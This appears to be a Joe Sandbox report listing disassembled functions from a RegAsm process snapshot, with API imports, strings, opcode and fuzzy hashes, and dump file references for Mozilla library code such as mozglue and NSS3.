API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
String ID:
API String ID: 3168180809-0
Opcode ID: 7c8932ce47797427c6893660556c069b4284d21a99529dda51cb41223d67377c
Instruction ID: aa9947be419c0e5355bc5cf02449a126f2a5189eab0730578ced361bb8cff117
Opcode Fuzzy Hash: 7c8932ce47797427c6893660556c069b4284d21a99529dda51cb41223d67377c
Instruction Fuzzy Hash: 1E315731A043559BC714CF38888455BB7E8BF82774F104B2EF8A6A36D1EB7098458B92

Function 6C7A5EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON

Download Yara Rule

APIs

?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C7BDCA0,?,?,?,6C77E8B5,00000000), ref: 6C7A5F1F
?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C77E8B5,00000000), ref: 6C7A5F4B
?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C77E8B5,00000000), ref: 6C7A5F7B
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C77E8B5,00000000), ref: 6C7A5F9F
?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C77E8B5,00000000), ref: 6C7A5FD6

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
String ID:
API String ID: 1389714915-0
Opcode ID: 48447e8e17df779e292a5843c3f01254db75b78a87eabd673dd461f39252b5ff
Instruction ID: 07d6a80e1953fc265e672219db476347222f0ffd94dc7b77648ab4222d46ecf7
Opcode Fuzzy Hash: 48447e8e17df779e292a5843c3f01254db75b78a87eabd673dd461f39252b5ff
Instruction Fuzzy Hash: E7313C34300A018FD750CF69D998E2AB7F9FF89319BA48668F55687795C731EC42CB80

Function 6C74B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C74B532
moz_xmalloc.MOZGLUE(?), ref: 6C74B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C74B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C74B57E
free.MOZGLUE(00000000), ref: 6C74B58F

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 30571d260b2982965dd7e59bcbae652ff3c0a3ac12621fad83fdf918e14dcb40
Instruction ID: 22254ae42119247e42bf6a595f2b61e7190ace362655f507cfb4f8db7806a84a
Opcode Fuzzy Hash: 30571d260b2982965dd7e59bcbae652ff3c0a3ac12621fad83fdf918e14dcb40
Instruction Fuzzy Hash: A921D271A006059BDB009F69CD44BAEFBB9FF46304F288039E8189B341E735ED11C7A0

Function 6C74B7A0 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C74B7CF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C74B808
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C74B82C
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C74B840
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C74B849

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
String ID:
API String ID: 1977084945-0
Opcode ID: 76417c19ca4f4ebca19adcbd19a8f42c302e3e273bb6861acb39699b10c27994
Instruction ID: 17b3876cdd02a2eec9c6c0e060669f91e92eb0d8cc34557cfeaf6f6f48739b52
Opcode Fuzzy Hash: 76417c19ca4f4ebca19adcbd19a8f42c302e3e273bb6861acb39699b10c27994
Instruction Fuzzy Hash: 17212BB0E002099FDF04DFA9C9855BEBBB8EF49314F148129EC45A7341E731AA84CBE1

Function 6C7A6E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C7A6E78

Part of subcall function 6C7A6A10: InitializeCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6A68
Part of subcall function 6C7A6A10: GetCurrentProcess.KERNEL32 ref: 6C7A6A7D
Part of subcall function 6C7A6A10: GetCurrentProcess.KERNEL32 ref: 6C7A6AA1
Part of subcall function 6C7A6A10: EnterCriticalSection.KERNEL32(6C7CF618), ref: 6C7A6AAE
Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6AE1
Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C7A6B15
Part of subcall function 6C7A6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C7A6B65
Part of subcall function 6C7A6A10: LeaveCriticalSection.KERNEL32(6C7CF618,?,?), ref: 6C7A6B83

MozFormatCodeAddress.MOZGLUE ref: 6C7A6EC1
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7A6EE1
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C7A6EED
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C7A6EFF

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
String ID:
API String ID: 4058739482-0
Opcode ID: 1e88bb323eba81ab1b0790ac41fa32e406858827575a59c036123fcb1f6b8126
Instruction ID: 2c3936fcf83be2e472029d35556f422f7a55620001d8b76dfdbc0e96530bd827
Opcode Fuzzy Hash: 1e88bb323eba81ab1b0790ac41fa32e406858827575a59c036123fcb1f6b8126
Instruction Fuzzy Hash: 8C21A4B1A0421A9FDF10CF69D9896DA77F9FF88308F044139E84997341DB70AA598F92

Function 6C756390 Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C7563D0
AcquireSRWLockExclusive.KERNEL32 ref: 6C7563DF
ReleaseSRWLockExclusive.KERNEL32 ref: 6C75640E
__Init_thread_footer.LIBCMT ref: 6C756467
??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C7564A8

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
String ID:
API String ID: 3202982786-0
Opcode ID: 3b55a31b9bda484e033c107da105f3583984e155a687cae912d819c18eee7486
Instruction ID: 9f6955a46166a378df69365b2abb7e2a056362d3a4c08e78055708d09a2b5597
Opcode Fuzzy Hash: 3b55a31b9bda484e033c107da105f3583984e155a687cae912d819c18eee7486
Instruction Fuzzy Hash: C231AEB16042468FDB00DF68C24965ABBF0FF86319F10453DE8A583B50CB34A788CBA7

Function 6C8F2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C8F5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C8F5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8F2CEC

Part of subcall function 6C90C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C90C2BF

PR_EnterMonitor.NSS3(?), ref: 6C8F2D02
PR_EnterMonitor.NSS3(?), ref: 6C8F2D1F
PR_ExitMonitor.NSS3(?), ref: 6C8F2D42
PR_ExitMonitor.NSS3(?), ref: 6C8F2D5B

Memory Dump Source

Source File: 00000003.00000002.2272879099.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true

Associated: 00000003.00000002.2271733381.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2291783107.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292436423.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292519358.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292589475.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2292635391.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c7e0000_RegAsm.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: bda344ae4e96b6378d29179f5d14e23d43e8b98fdc62f0634982f3b704650d4c
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: D701CCB19102445BE7309E29FC40BC7B7A5EF55359F014925E4A986710E63AF41687A2

Function 6C7A9B50 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C7A9B74
?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C7A9BBA
?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C7A9BC8
??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C7A9BD7
??GDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?,?,?), ref: 6C7A9BE0

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Decimal@blink@@$V01@V01@@$V12@$?ceil@?floor@
String ID:
API String ID: 2380687156-0
Opcode ID: b065e1ce3bf1fdac937342f65ae8f822a8cf6e09f19f0e578d6cd7ce503bc361
Instruction ID: 7a48f2a04bf14bb53eb8708d206158dc89022b59e5cbeb50075c65eec3a6b18b
Opcode Fuzzy Hash: b065e1ce3bf1fdac937342f65ae8f822a8cf6e09f19f0e578d6cd7ce503bc361
Instruction Fuzzy Hash: 37118631914348ABC7009FA88D4989FB7B8FFD9364F004B1DF99646640DB319659C792

Function 6C780D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C743DEF), ref: 6C780D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C743DEF), ref: 6C780D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C743DEF), ref: 6C780DAF

Strings

<jemalloc>, xrefs: 6C780D92, 6C780DB9
: (malloc) Error in VirtualFree(), xrefs: 6C780D97, 6C780DBE

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 55831268facfa6aaf7356d8501009de5fb009be69eb6debf907c1415a284fb0c
Instruction ID: 4b11ac8d2ce61f927313fb866c0faee50631fae5f50efa66310b0dbf588e0726
Opcode Fuzzy Hash: 55831268facfa6aaf7356d8501009de5fb009be69eb6debf907c1415a284fb0c
Instruction Fuzzy Hash: 21F089313876962BE62011665E0BF6A265D6BC2B65F348135F704DAEC0DA54F40446B6

Function 6C7A5850 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF), ref: 6C7A586C
CloseHandle.KERNEL32 ref: 6C7A5878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C7A5898
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C7A58C9
free.MOZGLUE(00000000), ref: 6C7A58D3

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$CloseHandleObjectSingleWait
String ID:
API String ID: 1910681409-0
Opcode ID: 647b2877c4b45483f35cf895f90c9135cd8074e9bfcd3c8042c6002c0a914330
Instruction ID: d11543deab919f36bdefdba59822c3722d4d87554d06e1b8f0c1d57e088c4223
Opcode Fuzzy Hash: 647b2877c4b45483f35cf895f90c9135cd8074e9bfcd3c8042c6002c0a914330
Instruction Fuzzy Hash: F5011D717042039FDF00DF5AFD08A067BB9FB833697244276E61AD2610D735DA158F91

Function 6C797620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C7975C4,?), ref: 6C79762B

Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C7974D7,6C791385,?,?,?), ref: 6C797644
GetCurrentThreadId.KERNEL32 ref: 6C79765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7974D7,6C791385,?,?,?), ref: 6C797663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C7974D7,6C791385,?,?,?), ref: 6C797677

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: 73197442231b6722e36997f5c1a71042fc5a1b873286cd08e4b36bdc5ccecd42
Instruction ID: acb7a857ee442a1e86066321a7b621a985b38924171286818d0c97c9b164ece4
Opcode Fuzzy Hash: 73197442231b6722e36997f5c1a71042fc5a1b873286cd08e4b36bdc5ccecd42
Instruction Fuzzy Hash: 99F08C76E10786AFD7008F61C888666BB78FFAA659F114326F90442601E7B0B6D08BD0

Function 6C7A1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C7A1800

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

Part of subcall function 6C744290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C783EBD,6C783EBD,00000000), ref: 6C7442A9

Strings

{marker.name} - {marker.data.name}, xrefs: 6C7A18C7
Details, xrefs: 6C7A1925
name, xrefs: 6C7A1939

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 07e395597380113b68e082060e61e7994c17e65c6c3236c5e1429ae86581b590
Instruction ID: 2a5322cb311486681b48ecafca7582898c2baf2810e226cab6b27010eb741b5f
Opcode Fuzzy Hash: 07e395597380113b68e082060e61e7994c17e65c6c3236c5e1429ae86581b590
Instruction Fuzzy Hash: 99710370A0074ADFDB04CF69D58879ABBB5FF45314F004669D8154BB41D730E699CBE2

Function 6C7AB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C7AB0A6,6C7AB0A6,?,6C7AAF67,?,00000010,?,6C7AAF67,?,00000010,00000000,?,?,6C7AAB1F), ref: 6C7AB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C7AB0A6,6C7AB0A6,?,6C7AAF67,?,00000010,?,6C7AAF67,?,00000010,00000000,?), ref: 6C7AB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C7AB0A6,6C7AB0A6,?,6C7AAF67,?,00000010,?,6C7AAF67,?,00000010), ref: 6C7AB25F

Strings

map/set<T> too long, xrefs: 6C7AB1FA

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: fec144691eec74e859afe2383f0d703f41da2906cf9ac99f45f6df476839da2d
Instruction ID: 1c0f409ef3dc4d2eb1c2f8b1d30dd056ca9355f95ca5e8112f4f02d9f413bd02
Opcode Fuzzy Hash: fec144691eec74e859afe2383f0d703f41da2906cf9ac99f45f6df476839da2d
Instruction Fuzzy Hash: C1617B746002498FD701CF99DA84A9ABBE1BF49358F18C6A9D8598BB52C331FC46CB91

Function 6C792CF0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C792E2D

Strings

(root), xrefs: 6C79354F
expected a Time entry, xrefs: 6C792E36
ProfileBuffer parse error: %s, xrefs: 6C792E3B

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 711238415-4149320968
Opcode ID: 197d957731c44988eba029a50ec1a19a733a693e0fe3dc59567c64e579d6062c
Instruction ID: a7772f453f908a0caaf3366bfb4d0feb546e8425cde991da6980d065274a9343
Opcode Fuzzy Hash: 197d957731c44988eba029a50ec1a19a733a693e0fe3dc59567c64e579d6062c
Instruction Fuzzy Hash: B151E1B06083818FC724DF24E68959FF7E1AFC9358F10492DE59A97760EB30D949CB46

Function 6C76D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C77CBE8: GetCurrentProcess.KERNEL32(?,6C7431A7), ref: 6C77CBF1
Part of subcall function 6C77CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7431A7), ref: 6C77CBFA

EnterCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D4F2
LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D50B

Part of subcall function 6C74CFE0: EnterCriticalSection.KERNEL32(6C7CE784), ref: 6C74CFF6
Part of subcall function 6C74CFE0: LeaveCriticalSection.KERNEL32(6C7CE784), ref: 6C74D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D52E
EnterCriticalSection.KERNEL32(6C7CE7DC), ref: 6C76D690
LeaveCriticalSection.KERNEL32(6C7CE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C77D1C5), ref: 6C76D751

Strings

MOZ_CRASH(), xrefs: 6C76D4BB

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: b0331040749ccbc3b540d9d71a8891d954bf293b42dc0e340f5d3b3a3f0125c3
Instruction ID: 302274b390d3ad9aad69dae23807a82f7a4f3ef4c1c8448bfc59ed66dc67e488
Opcode Fuzzy Hash: b0331040749ccbc3b540d9d71a8891d954bf293b42dc0e340f5d3b3a3f0125c3
Instruction Fuzzy Hash: 01512371A047468FD724CF29C29871AB7E1EB99704F24493EE999C7F85D730E800CB96

Function 6C794630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C794721

Strings

-%llu, xrefs: 6C794733
., xrefs: 6C79476A
profiler-paused, xrefs: 6C7946E4

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: e4c1ac5ed51b613b30d4bf9f63a7bf1f182f812d8e10a930d667159a1149ba07
Instruction ID: 47c96107511ef0fa4b6d2de7d00ba41afcd6e0da6c849ffcd0e2e180c9e42dd3
Opcode Fuzzy Hash: e4c1ac5ed51b613b30d4bf9f63a7bf1f182f812d8e10a930d667159a1149ba07
Instruction Fuzzy Hash: CD417771E047089FCB08DF78E95519EBBF5EF85744F10863DE865ABB41EB3098448751

